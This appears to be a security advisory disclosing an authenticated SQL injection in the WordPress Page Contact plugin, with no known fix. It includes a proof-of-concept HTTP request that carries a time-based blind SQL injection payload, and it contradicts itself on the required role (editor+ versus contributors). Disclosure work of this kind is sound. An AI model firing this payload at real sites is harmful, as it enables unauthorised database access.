WordPress Plugin Vulnerabilities

WordPress Page Contact <= 1.0 - Authenticated (editor+) SQL Injection

Description

The Orders functionality in the plugin has an order_id parameter which is not sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection. The feature is available to low privilege users such as contributors

Proof of Concept

POST /wp-admin/admin.php?page=wpagecontact-plugin HTTP/1.1
Content-Length: 315
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [editor+]
Connection: close

wpc_hidden_field=(CASE%20WHEN%20(7627=7627)%20THEN%20SLEEP(5)%20ELSE%207627%20END)&wpc_method_field=Edit&wpc_id_field=1&wpc_first_field=sheeraz&wpc_last_field=ali&wpc_email_field=xxx%40gmail.com&wpc_phone_field=%2B917974234098&wpc_fax_field=axdsa&wpc_company_field=student&wpc_division_field=as&wpc_image_field=http%3A%2F%2F192.168.0.102%2Fsdasd&wpc_misc_field=asd

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Syed Sheeraz Ali of Codevigilant
Verified
Yes

Timeline

Publicly Published
2021-08-22 (about 2 years ago)
Added
2021-08-23 (about 2 years ago)
Last Updated
2022-03-07 (about 2 years ago)

Other